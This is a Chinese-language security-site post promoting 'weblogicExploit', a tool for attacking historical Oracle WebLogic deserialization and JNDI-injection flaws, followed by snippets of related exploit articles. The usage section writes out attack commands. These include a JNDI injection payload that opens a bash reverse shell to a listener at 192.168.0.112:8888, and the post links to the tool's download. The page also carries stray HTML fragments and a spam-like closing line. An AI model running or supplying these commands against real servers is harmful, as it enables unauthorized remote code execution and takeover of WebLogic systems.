<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    weblogic歷史漏洞利用工具 -- weblogicExploit

    VSole2022-11-29 10:55:26

    一、工具介紹

    工具部分代碼借鑒前輩的weblogic_cmd,屬于二次再造輪子,部分功能暫未完善,后續將繼續往上加功能。

    二、安裝與使用

    1、列出可控payloads

    java -jar weblogic.jar -payloads
    

    2、啟動JRMPListener

    java -jar weblogic.jar -Jport 8888 -payload cc6 -c calc.exe
    

    3、啟動LDAP/RMI

    LDAP
    java -jar weblogic.jar -jndistart -Jport 8888 -jndildap -codeurl http://127.0.0.1/#wlc618
    RMI
    java -jar weblogic.jar -jndistart -Jport 8888 -jndirmi -codeurl http://127.0.0.1/
    

    4、高版本jndi注入 ldap

    java -jar weblogic\ tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'open /System/Applications/Calculator.app'
    java -jar weblogic\ tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'bash -i >& /dev/tcp/192.168.0.112/8888 0>&1'
    

    三、下載地址:

    https://github.com/8ypass/weblogicExploit

    weblogic
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    去年weblogic出白名單時研究了下怎么繞過,總結出了下面的思路,本想再找找有無新的攻擊面的思路,但是找了幾次都沒找到,后來就擱置了。readMsgAbbrevs函數就會對流中的序列化數據進行反序列化,調用的是InboundMsgAbbrev類的readObject方法,并存儲在棧中。這里也就是之前weblogic的漏洞會觸發的readObject的地方。但是在21年4月的補丁中,Weblogic使用了白名單,只有以下七種類可以被反序列化,因此所有Weblogic原本的漏洞都無法使用。
    驗證環境weblogic/wsee/jaxws/WLSServletAdapter.class的handle方法打上斷點訪問http://127.0.0.1:7001/wls-wsat/CoordinatorPortType關于T3協議T3協議是Weblogic用于通信的獨有的一個協議,Weblogic Server的RMI通信使用它在其他區的Java程序傳輸數據。T3協議的組成這里借一張圖解釋一下關于 T3協議的組成ac ed 00 05是反序列化標志,而在 T3 協議中每個序列化數據包前面都有fe 01 00 00,所以 T3 的序列化標志為fe 01 00 00 ac ed 00 05并且在發送T3協議的時候 還可以發送多個序列化數據 ,可以替換其中一個的序列化數據 實現反序列化攻擊。
    weblogic T3 attack&cve
    2023-03-29 10:07:32
    定義了固定的t3header和反序列化標志頭fe010000。RFC1700規定使用“大端”字節序為網絡字節序,所以對生成的payload使用>大端模式打包,I表示unsigned int。CVE-2016-0638復現需要打補丁,找不到懶得打了,簡單說一下繞過,不寫poc了黑名單列表為:+org.apache.c
    java -jar weblogic.jar -jndistart -Jport 8888 -jndirmi -codeurl http://127.0.0.1/
    通過common-collection相關gadget,想辦法調用org.mozilla.classfile.DefiningClassLoader這個類去加載字節碼。然后通過T3協議的反序列化漏洞發送給待攻擊weblogic服務器。
    后續經過掃描探測發現T3、IIOP協議同時關閉了,僅限HTTP訪問。需要用戶名密碼,打補丁后,可以判斷用戶名密碼是否存在,但是無法上傳文件成功。
    我記得大概是15年年底時,冰蝎作者rebeyond第一個公布出Weblogic T3反序列化回顯方法,而且給出了相關的代碼。早期的Weblogic反序列化利用工具,為了實現T3協議回顯,都會向服務器上寫入一個臨時文件。
    開始著手對Weblogic歷史漏洞進行剖析,周末分析了Weblogic歷史上的嚴重漏洞,一次針對CVE-2015-4852漏洞的補丁繞過。原理雖然簡單,但是時間太過久遠,一些關鍵點被歷史的長河淹沒。找了很多師傅們的博客文章,關于如何封裝之前的利用鏈,大多是用的https://github.com/5up3rc/weblogic_cmd中的現有功能。打算從補丁分析、補丁繞過、利用構造三大方面開始分析
    weblogic 漏洞掃描工具
    2021-08-09 09:00:47
    weblogic 漏洞掃描工具
    漏洞概述 Oracle官方發布了10月份的安全補丁, 補丁中包含啟明星辰ADLab發現并第一時間提交給官方的漏洞,漏洞編號為CVE-2020-14820。通過該漏洞,攻擊者可以在未授權的情況下將payload封裝在T3或IIOP協議中,通過對協議中的payload進行反序列化,從而實現對存在漏洞的WebLogic組件進行遠程Blind XXE攻擊。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类